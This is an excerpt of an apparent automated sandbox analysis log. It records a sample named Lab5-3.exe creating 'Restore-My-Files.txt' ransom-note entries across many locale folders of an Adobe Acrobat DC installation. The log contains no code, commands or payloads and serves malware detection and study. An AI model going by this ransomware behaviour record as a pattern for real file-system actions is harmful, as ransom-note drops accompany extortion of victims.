                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\Restore-My-Files.txtJump to behavior
